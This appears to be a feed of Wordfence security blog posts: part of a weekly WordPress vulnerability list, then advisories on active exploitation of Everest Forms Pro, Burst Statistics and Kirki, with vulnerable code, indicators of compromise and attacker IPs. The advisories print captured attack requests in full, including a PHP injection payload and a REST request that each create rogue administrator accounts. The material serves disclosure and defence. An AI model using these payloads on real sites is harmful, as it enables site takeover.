Unpatched

Published
May 27, 2026

Affected Software

Adminimize [adminimize]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-25444

Patch Status
Patched

Published
May 26, 2026

Affected Software

Appointment Booking Plugin for WooCommerce – WpBookingly | All-in-One Service Manager [service-booking-manager]

Researcher

johska

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8938

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

auto making JSON-LD [auto-making-json-ld]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24527

Patch Status
Unpatched

Published
May 25, 2026

Affected Software

Autoship Cloud for WooCommerce Subscription Products [autoship-cloud]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2025-69103

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Brikk – Directory & Listing WordPress Theme [brikk]

Researcher

Denver Jackson

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8941

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

CDN Linker lite [ossdl-cdn-off-linker]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-39436

Patch Status
Patched

Published
May 25, 2026

Affected Software

cformsII [cforms2]

Researcher

Ilay Striechman

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9236

Patch Status
Patched

Published
May 26, 2026

Affected Software

CM Ad Changer – A simple tool to control and optimize your site’s banners [cm-ad-changer]

Researcher

jamaal

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49047

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

DearFlip – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer [3d-flipbook-dflip-lite]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7533

Patch Status
Patched

Published
May 27, 2026

Affected Software

Easy Digital Downloads – eCommerce Payments and Subscriptions made easy [easy-digital-downloads]

Researcher

type5afe

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49052

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor [elementskit-lite]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9015

Patch Status
Patched

Published
May 27, 2026

Affected Software

Equalize Digital Accessibility Checker – WCAG, ADA, EAA and Section 508 compliance [accessibility-checker]

Researcher

w1zard

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-4888

Patch Status
Patched

Published
May 27, 2026

Affected Software

Everest Forms – Contact Form, Payment Form, Quiz, Survey & Custom Form Builder [everest-forms]

Researcher

Quốc Huy (jtwings)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24574

Patch Status
Patched

Published
May 25, 2026

Affected Software

Export WordPress Pages to Static HTML & PDF — Static Site Export [export-wp-page-to-static-html]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24520

Patch Status
Patched

Published
May 26, 2026

Affected Software

Feeds for TikTok – Display Video Feeds in Grid Layouts [b-tiktok-feed]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24582

Patch Status
Unpatched

Published
May 25, 2026

Affected Software

FlexTable – Data Table Sync with Google Sheets [sheets-to-wp-table-live-sync]

Researcher

Genemy – Creative Minimal Landing Page Builder for Digital Startup Design Studio Agency in Marketing [genemy]

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9241

Patch Status
Patched

Published
May 27, 2026

Affected Software

FOX – Currency Switcher Professional for WooCommerce [woocommerce-currency-switcher]

Researcher

Long Lagon

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2025-69137

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-48877

Patch Status
Patched

Published
May 27, 2026

Affected Software

GenerateBlocks [generateblocks]

Researcher

Abu Hurayra (HurayraIIT)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8708

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Genzel breadcrumbs [genzel-breadcrumbs]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8943

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

GoStats for WordPress [gostats-for-wordpress]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2025-69128

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

JobCareer [jobcareer]

Researcher

Denver Jackson

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8942

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

MetaMagic SEO Plugin [metamagic]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-32389

Patch Status
Patched

Published
May 25, 2026

Affected Software

Home Health Care, Medical Care WordPress Theme – NanoCare [nanocare]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24586

Patch Status
Unpatched

Published
May 25, 2026

Affected Software

Newses [newses]

Researcher

John P

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7614

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Old Posts Highlighter [old-posts-highlighter]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24597

Patch Status
Patched

Published
May 25, 2026

Affected Software

Organization chart [organization-chart]

Researcher

Benedictus Jovan (aillesiM)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7526

Patch Status
Patched

Published
May 27, 2026

Affected Software

PDF Embedder [pdf-embedder]

Researcher

Dmitrii Ignatyev

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9618

Patch Status
Patched

Published
May 27, 2026

Affected Software

PeachPay — Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI) [peachpay-for-woocommerce]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8995

Patch Status
Patched

Published
May 28, 2026

Affected Software

Poll Maker by AYS – Versus Polls, Anonymous Polls, Image Polls [poll-maker]

Researcher

Satoo Nakano

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-48971

Patch Status
Patched

Published
May 27, 2026

Affected Software

Product Import Export for WooCommerce – Import Export Product CSV Suite [product-import-export-for-woo]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24545

Patch Status
Patched

Published
May 25, 2026

Affected Software

QR Redirector [qr-redirector]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24638

Patch Status
Patched

Published
May 26, 2026

Affected Software

RepairBuddy – Repair Shop CRM & Booking Plugin for WordPress [computer-repair-shop]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8939

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Search Simple Fields [search-simple-fields]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7621

Patch Status
Patched

Published
May 27, 2026

Affected Software

SMTP2GO for WordPress – Email Made Easy [smtp2go]

Researcher

darkmode

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-24554

Patch Status
Patched

Published
May 25, 2026

Affected Software

Subscription & Recurring Payment for WooCommerce [subscription]

Researcher

theviper17

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-42776

Patch Status
Patched

Published
May 26, 2026

Affected Software

Sunshine Photo Cart – Client Photo Gallery & Photo Proofing for Photographers [sunshine-photo-cart]

Researcher

Dave Jong

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-48973

Patch Status
Patched

Published
May 27, 2026

Affected Software

SVG Support [svg-support]

Researcher

Steven Julian

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49054

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid [the-post-grid]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9228

Patch Status
Patched

Published
May 27, 2026

Affected Software

Timetable and Event Schedule by MotoPress [mp-timetable]

Researcher

Jack Pas (Dark.)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-27331

Patch Status
Patched

Published
May 26, 2026

Affected Software

Travelly – Tour & Travel Booking Manager for WooCommerce | Tour & Hotel Booking Solution [tour-booking-manager]

Researcher

johska

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8903

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Two-factor authentication (formerly IP Vault) [ip-vault-wp-firewall]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8689

Patch Status
Patched

Published
May 27, 2026

Affected Software

Visualizer: Tables and Charts Manager for WordPress [visualizer]

Researcher

davidfdzmorilla

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2025-14361

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Woocommerce Envato Affiliates [wooenvato]

Researcher

Trương Hữu Phúc (truonghuuphuc)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49051

Patch Status
Patched

Published
May 27, 2026

Affected Software

WP Meta and Date Remover [wp-meta-and-date-remover]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2025-14481

Patch Status
Patched

Published
May 26, 2026

Affected Software

Yoast SEO – Advanced SEO with real-time guidance and built-in AI [wordpress-seo]

Researcher

NumeX

CVSS Rating
3.1 (Low)

CVE-ID

CVE-2026-42749

Patch Status
Patched

Published
May 29, 2026

Affected Software

Disable Comments & Delete All Comments [comments-plus]

Researcher

CVSS Rating
2.7 (Low)

CVE-ID

CVE-2026-27346

Patch Status
Patched

Published
May 25, 2026

Affected Software

B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form & More [b2bking-wholesale-for-woocommerce]

Researcher

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (May 25, 2026 to May 31, 2026) appeared first on Wordfence.

Attackers Actively Exploiting Critical Vulnerability in Everest Forms Pro Plugin

Simon Browning — Wed, 03 Jun 2026 18:47:06 +0000

On March 30th, 2026, we publicly disclosed a critical Remote Code Execution vulnerability in Everest Forms Pro, a WordPress plugin with an estimated 4,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to execute arbitrary PHP code on the server, leading to complete site compromise. The vendor released the fully patched version on March 18th, 2026. Our records indicate that attackers started exploiting the issue on April 13th, 2026. The Wordfence Firewall has already blocked over 29,300 exploit attempts targeting this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026.

Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of Everest Forms Pro, version 1.9.13 at the time of this writing, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-3300

Affected Version(s)
<= 1.9.12

Patched Version
1.9.13

Bounty
$325.00

Affected Software

Everest Forms Pro [everest-forms-pro]

Researcher

200,000 WordPress Sites at Risk from Critical Authentication Bypass Vulnerability in Burst Statistics Plugin

The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon’s process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the “Complex Calculation” feature.

Vulnerability Details

Examining the code reveals that the plugin uses the process_filter() function in the EverestFormsProAddonsCalculationProcessProcess class to evaluate user-defined calculation formulas. The function concatenates submitted form field values into a PHP code string, which is then passed to the eval() function, with the following code snippet:

// Calculate Complex calculation.
if ( isset( $field['php_code'] ) && isset( $field['js_code'] ) && ! empty( $field['php_code'] ) && ! empty( $field['js_code'] ) ) {
	$php_code       = $field['php_code'];
	$field_variable = array();

	foreach ( $form_data['form_fields'] as $field_id => $form_field_data ) {
		$field_id_arr = explode( '-', $field_id );
		$var_name     = '$FIELD_' . $field_id_arr[1];
		$field_type   = $form_field_data['type'];
		$field_value  = ! empty( $entry['form_fields'][ $field_id ] ) ? $entry['form_fields'][ $field_id ] : 0;

		$excludeField = array(
			'credit-card',
			'square-payment',
			'authorize-net',
			'textarea',
			'privacy-policy',
			'signature',
			'address',
			'phone',
			'date-time',
			'wysiwyg',
			'color',
			'country',
			'yes-no',
			'likert',
			'yes-no',
			'image-upload',
			'file-upload',
			'scale-rating',
		);

		if ( in_array( $field_type, $excludeField ) ) {
			continue;
		}

		if ( ! is_array( $field_value ) ) {
			$field_value = trim( preg_replace( '/$/', '', $field_value ) );
			switch ( $field_type ) {
				case 'text':
				case 'select':
				case 'url':
				case 'email':
				case 'first-name':
				case 'last-name':
				case 'name':
				case 'radio':
					if ( is_numeric( $field_value ) ) {
						$field_variable[] = "$var_name = $field_value";
					} else {
						$field_variable[] = "$var_name = '$field_value'";
					}
					break;

				case 'payment-multiple':
					$field_value = ! empty( $form_field_data['choices'][ $field_value ]['value'] ) ? $form_field_data['choices'][ $field_value ]['value'] : 0;
					if ( is_numeric( $field_value ) ) {
						$field_variable[] = "$var_name = $field_value";
					} else {
						$field_variable[] = "$var_name = '$field_value'";
					}
					break;
				default:
					if ( is_numeric( $field_value ) ) {
						$field_variable[] = "$var_name = $field_value";
					} else {
						$field_variable[] = "$var_name = '$field_value'";
					}
					break;
			}
		} else {
			switch ( $field_type ) {
				case 'payment-checkbox':
					$field_value = ! empty( $form_fields[ $field_id ]['value']['amount'] ) ? $form_fields[ $field_id ]['value']['amount'] : 0;
					if ( is_numeric( $field_value ) ) {
						$field_variable[] = "$var_name = $field_value";
					} else {
						$field_variable[] = "$var_name = '$field_value'";
					}
					break;

				default:
					break;
			}
		}
	}

	$final_field_variables                    = implode( ";n", $field_variable );
	$return_var                               = Transpiler::RESULT_VAR_NAME;
	${Transpiler::FUNCTIONS_ARRAY_NAME}       = $this->functions;
	${Transpiler::INNER_FUNCTIONS_ARRAY_NAME} = $this->inner_functions;

	$php_code = preg_replace( '/
Although user input is sanitized with sanitize_text_field(), this function does not escape single quotes or other characters that are significant in PHP code. For string-based fields (such as text, email, select, and radio fields), the submitted value is placed inside single quotes and directly added to a PHP code string. An unauthenticated attacker can exploit this by submitting a value containing a single quote, followed by malicious PHP code and a comment character, allowing them to break out of the string and inject PHP code that is later executed through the eval() function.
This makes it possible for unauthenticated attackers to execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field, as long as the targeted form uses the “Complex Calculation” feature.
As with all remote code execution vulnerabilities, this can lead to complete site compromise through the creation of administrator accounts, the use of webshells, and other techniques.
A Closer Look at the Attack Data
The following data highlights actual exploit attempts from threat actors targeting this vulnerability.
Example attack request
The most common payload observed in our blocked requests attempts to create a new administrator account named “diksimarina” on the affected site.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

everest_forms[id]=2909&everest_forms[form_fields][svbtwqPN9R-2]=';if(!username_exists('diksimarina')){wp_insert_user(array('user_login'=>'diksimarina','user_pass'=>'[redacted]','user_email'=>'diksimarina@gmail.com','role'=>'administrator'));echo 'ADMINCREATED';}else{echo 'ADMINEXISTS';} //&everest_forms[form_fields][eluWudCcdM-1]=test&everest_forms[form_fields][email]=test&everest_forms[form_fields][rVuWSql19Q-3]=test&everest_forms[form_fields][rwkAbDLqrq-7]=test&everest_forms[form_fields][LKLn7arQDU-5]=test&action=everest_forms_ajax_form_submission&security=cd840335ff

In the request above, the attacker submits a value for a text field that begins with a single quote to close the wrapping string literal, followed by a PHP statement that calls wp_insert_user() to create a new administrator account with the username “diksimarina”. The trailing // comment marker ensures the rest of the generated PHP code, including the closing quote, is treated as a comment and does not cause a syntax error. When the form is processed and the calculation is evaluated, the injected PHP code is executed and the malicious administrator account is created. Once authenticated as the new administrator, the attacker can fully compromise the site by uploading webshells, modifying themes or plugins, or installing further backdoors for persistent access.
Wordfence Firewall
The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Total Number of Exploits Blocked
The Wordfence Firewall has blocked over 29,300 exploit attempts since the vulnerability was publicly disclosed.

According to our data, attackers started targeting websites on April 13th, 2026. We also detected and blocked a large number of exploit attempts on May 16th, 2026, when over 17,900 exploit attempts were blocked in a single day.
Top Offending IP Addresses
The following IP Addresses are currently the most actively engaged IP addresses targeting the Everest Forms Pro Complex Calculation feature:

202.56.2.126

Over 26,300 blocked requests.


209.146.60.26

Over 2,600 blocked requests.


15.235.166.18

Over 250 blocked requests.


2402:1f00:8000:800::40db

Over 80 blocked requests.


185.78.165.153

Over 10 blocked requests.




Indicators of Compromise
The attackers are attempting to create new administrator accounts on affected sites. It is recommended to review the list of WordPress users on your site.
In particular, look for an administrator account with the username “diksimarina” or the email address “diksimarina@gmail.com”, which has been the most commonly observed payload in attacks targeting this vulnerability.
We also recommend reviewing log files for any requests originating from the following IP addresses:

202.56.2.126
209.146.60.26
15.235.166.18
2402:1f00:8000:800::40db
185.78.165.153

Conclusion
In today’s article, we covered the attack data for a critical-severity Remote Code Execution vulnerability in the Everest Forms Pro plugin that allows unauthenticated threat actors to execute arbitrary PHP code and achieve complete site compromise. Our threat intelligence indicates that attackers started actively targeting this vulnerability on April 13th, 2026, with mass exploitation occurring on May 16th, 2026. The Wordfence firewall has already blocked over 29,300 exploit attempts targeting this vulnerability.
Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026.
Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to the latest version 1.9.13 in order to maintain normal functionality. If you have friends or colleagues using Everest Forms Pro, be sure to forward this advisory to them, as sites could still be unprotected and unpatched.
If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.
The post Attackers Actively Exploiting Critical Vulnerability in Everest Forms Pro Plugin appeared first on Wordfence.

Attackers Actively Exploiting Critical Vulnerability in Burst Statistics Plugin

Simon Browning — Tue, 02 Jun 2026 16:48:34 +0000

On May 13th, 2026, we publicly disclosed a critical Authentication Bypass vulnerability in Burst Statistics, a WordPress plugin with 200,000 active installations. This vulnerability can be leveraged by unauthenticated attackers, with knowledge of an administrator username, to impersonate that administrator and achieve complete site takeover. The vendor released the fully patched version on May 13th, 2026. We disclosed this vulnerability in the Wordfence Intelligence vulnerability database and in a blog post on the same day. Our records indicate that attackers started exploiting the issue the same day, on May 13th, 2026. The Wordfence Firewall has already blocked over 112,800 exploit attempts targeting this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 8, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on June 7, 2026.

Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of Burst Statistics, version 3.4.2 at the time of this writing, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8181

Affected Version(s)
3.4.0 – 3.4.1.1

Patched Version
3.4.2

Affected Software

Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) [burst-statistics]

Researchers

Chloe Chamberland

PRISM

The Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) plugin for WordPress is vulnerable to Authentication Bypass in versions 3.4.0 to 3.4.1.1. This is due to incorrect return-value handling in the `is_mainwp_authenticated()` function when validating application passwords from the Authorization header. This makes it possible for unauthenticated attackers, with knowledge of an administrator username, to impersonate that administrator for the duration of the request by supplying any random Basic Authentication password achieving privilege escalation.

Vulnerability Details

To exploit the vulnerability, an attacker only needs to know a valid administrator username. By sending a REST API request with the X-BurstMainWP: 1 header and arbitrary Basic Authentication credentials, the plugin incorrectly treats the request as authenticated and sets the current user to the supplied administrator account, allowing unauthorized access to administrator-level REST API functionality, such as creating a new administrator account.

In our blog post linked below, we detailed the vulnerability:

A Closer Look at the Attack Data

The following data highlights actual exploit attempts from threat actors targeting this vulnerability. It appears that threat actors are attempting to create new administrator accounts on affected sites by sending crafted REST API requests with forged Basic Authentication credentials.

Example attack request

POST /wp-json/wp/v2/users HTTP/1.1
X-Burstmainwp: 1
Host: [redacted]
Content-Type: application/json

{"username":"artba999x","email":"artba999x@email.ee","password":"[redacted]","roles":["administrator"]}

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Total Number of Exploits Blocked

The Wordfence Firewall has blocked over 112,800 exploit attempts since the vulnerability was publicly disclosed.

According to our data, attackers started targeting websites the same day the vulnerability was disclosed, on May 13th, 2026. We also detected and blocked a large number of exploit attempts from May 15th to 21st.

Top Offending IP Addresses

The following IP Addresses are currently the most actively engaged IP addresses targeting the Burst Statistics plugin authentication bypass vulnerability:

116.212.139.132
- Over 8,300 blocked requests.
210.247.204.106
- Over 6,600 blocked requests.
116.212.132.83
- Over 4,400 blocked requests.
159.65.141.85
- Over 4,300 blocked requests.
118.67.205.30
- Over 4,000 blocked requests.
188.166.247.192
- Over 2,800 blocked requests.
84.201.6.54
- Over 2,600 blocked requests.
45.156.87.207
- Over 2,000 blocked requests.
103.132.9.132
- Over 1,900 blocked requests.
118.67.205.88
- Over 1,900 blocked requests.

Indicators of Compromise

The attackers are attempting to create new administrator accounts on affected sites. It is recommended to review the list of WordPress users on your site and remove any unknown administrator accounts, especially ones created on or after May 13th, 2026.

Additionally, we recommend reviewing log files for any requests containing the X-BurstMainWP: 1 header or for any requests to the /wp-json/wp/v2/users endpoint originating from the following IP addresses:

116.212.139.132
210.247.204.106
116.212.132.83
159.65.141.85
118.67.205.30
188.166.247.192
84.201.6.54
45.156.87.207
103.132.9.132
118.67.205.88

Conclusion

In today’s article, we covered the attack data for a critical-severity Authentication Bypass vulnerability in the Burst Statistics plugin that allows unauthenticated threat actors, with knowledge of an administrator username, to impersonate that administrator and achieve complete site takeover. Our threat intelligence indicates that attackers started actively targeting this vulnerability the same day it was disclosed, on May 13th, 2026, with mass exploitation occurring between May 15th and 21st, 2026. The Wordfence firewall has already blocked over 112,800 exploit attempts targeting this vulnerability.

Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to at least version 3.4.2 in order to maintain normal functionality. If you have friends or colleagues using Burst Statistics, be sure to forward this advisory to them, as thousands of sites could still be unprotected and unpatched.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post Attackers Actively Exploiting Critical Vulnerability in Burst Statistics Plugin appeared first on Wordfence.

Unauthenticated Privilege Escalation Vulnerability Patched in Kirki WordPress Plugin

Simon Browning — Mon, 01 Jun 2026 17:38:29 +0000

On May 4th, 2026, we received a submission for an Unauthenticated Privilege Escalation vulnerability in the Kirki WordPress plugin. Although the plugin has more than 500,000 active installations, we estimate that only around 150,000 sites are using a vulnerable version, as the issue was introduced in the 6.0 major release. This vulnerability makes it possible for unauthenticated attackers to take over arbitrary user accounts on the site, including administrator accounts, by leveraging the plugin’s password reset functionality to have the password reset link delivered to an attacker-controlled email address.

Props to CHOIGYEONGMIN who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This researcher earned a bounty of $6,436 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to the multi-layered approach to security.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 9, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on June 8, 2026.

We provided full disclosure details to the Themeum team through our Wordfence Vulnerability Management Portal on May 15, 2026. The developer acknowledged the report on May 16, 2026, and released the fully patched version on May 18, 2026. We would like to commend the Themeum team for their prompt response and timely patch.

We urge users to update their sites to the latest patched version of Kirki, version 6.0.7 at the time of this publication, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8206

Affected Version(s)
6.0.0 – 6.0.6

Patched Version
6.0.7

Bounty
$6,436.00

Affected Software

Kirki – Freeform Page Builder, Website Builder & Customizer [kirki]

Researcher

CHOIGYEONGMIN

The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions 6.0.0 to 6.0.6. This is due to the plugin accepting an arbitrary email address when a username is used in the password reset request. This makes it possible for unauthenticated attackers to send a password reset link for any user registered on the site to their own email address.

Technical Analysis

Kirki is a plugin that provides freeform page building, website building, and WordPress Customizer enhancements. As part of its frontend account management features, the plugin exposes a custom REST API endpoint that handles password reset requests.

Examining the code reveals that the plugin uses the handle_forgot_password() function in the CompLibFormHandler class to process the forgot password request. The function accepts both a username and an email parameter from the request body.

public function handle_forgot_password( $request ) {
	$form_data     = $request->get_body_params();
	$transiet_name = $this->validate_nonce( 'kirki-forgot-password' );
	$email    = isset( $form_data['email'] ) ? sanitize_email( $form_data['email'] ) : '';
	$username = isset( $form_data['username'] ) ? sanitize_text_field( $form_data['username'] ) : '';
	if ( strlen( $username ) === 0 && isset( $form_data['email'] ) && strlen( $email ) > 0 ) {
		$user = get_user_by( 'email', $email );
		if ( $user ) {
			$username = $user->get( 'user_login' );
		} else {
			$response = array(
				'message' => 'User not found',
			);
			return new WP_REST_Response( $response, 404 );
		}
	}
	if ( isset( $username ) && strlen( $username ) > 0 ) {
		$user = get_user_by( 'login', $username );
		if ( ! $user ) {
			$response = array(
				'message' => 'User not found',
			);
			return new WP_REST_Response( $response, 404 );
		}
		$key = get_password_reset_key( $user );
		if ( is_wp_error( $key ) ) {
			$response = array(
				'message' => $key->get_error_message(),
			);
			return new WP_REST_Response( $response, 500 );
		}
		// Prepare email content.
		$url = HelperFunctions::get_utility_page_url( 'reset_password' );
		$username  = $user->user_login;
		$chip_data = array(
			'username'    => $username,
			'email'       => $email,
			'displayname' => $user->display_name,
			'sitename'    => get_bloginfo( 'name' ),
			'reset_link'  => "$url?action=rp&key=$key&login=" . rawurlencode( $username ),
		);
		$email_subject = isset( $form_data['emailSubject'] ) ? sanitize_text_field( $form_data['emailSubject'] ) : '';
		$email_body    = '';
		if ( isset( $form_data['emailBody'] ) ) {
			$email_body = json_decode( $form_data['emailBody'], true );
			foreach ( $email_body as $key => $body_data ) {
				if ( isset( $body_data['type'] ) && isset( $body_data['value'] ) && $body_data['type'] === 'text' ) {
					$email_body = $email_body . $body_data['value'];
				} elseif ( isset( $body_data['type'] ) && isset( $body_data['value'] ) && $body_data['type'] === 'chip' ) {
					$email_body = $email_body . $chip_data[ $body_data['value'] ];
				}
			}
		}
		$email_body = nl2br( $email_body );
		$headers = array( 'Content-Type: text/html; charset=UTF-8' );
		// Send custom email.
		apply_filters( 'kirki_element_smtp', '' );
		$sent = wp_mail( $email, $email_subject, $email_body, $headers );
		if ( $sent ) {
			$response = array(
				'message' => 'Email sent',
			);
			delete_transient( $transiet_name );
			return new WP_REST_Response( $response, 200 );
		} else {
			$response = array(
				'message' => 'Failed to send email',
			);
			return new WP_REST_Response( $response, 500 );
		}
	}
	$response = array(
		'message' => 'Invalid request',
	);
	return new WP_REST_Response( $response, 400 );
}

The intended flow is that a user submits either their username or email, the plugin identifies the matching user account, generates a password reset key with get_password_reset_key(), and emails the reset link to that user.

Unfortunately, the function contains a critical logic flaw. When a username is provided, the plugin correctly retrieves the targeted user account. However, instead of using the email address associated with that account, it continues to use the email address supplied in the request. As a result, an attacker can specify an arbitrary email address even after the target account has been identified by username.

This means an unauthenticated attacker can send a request specifying a high-privileged username together with an attacker-controlled email address and receive a valid password reset link for the targeted account. Using the reset link, the attacker can set a new password and gain full control of the account.

As with all privilege escalation vulnerabilities, this can lead to complete site compromise through account takeover of administrator accounts, allowing the attacker to install malicious plugins, create new administrator users, modify site content, or deploy webshells for persistent access.

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Disclosure Timeline

May 4, 2026 – We received the submission for the Unauthenticated Privilege Escalation vulnerability in Kirki via the Wordfence Bug Bounty Program.
May 8, 2026 – We validated the report and confirmed the proof-of-concept exploit.
May 9, 2026 – Wordfence Premium, Care, and Response users received a firewall rule to provide added protection against any exploits that may target this vulnerability.
May 15, 2026 – The full disclosure details are sent instantly to the vendor upon verifying ownership of their software through our Wordfence Vulnerability Management Portal.
May 16, 2026 – The vendor acknowledged the report and began working on a fix.
May 18, 2026 – The fully patched version of the plugin, 6.0.7, was released.
June 8, 2026 – Wordfence Free users will receive the same protection.

Conclusion

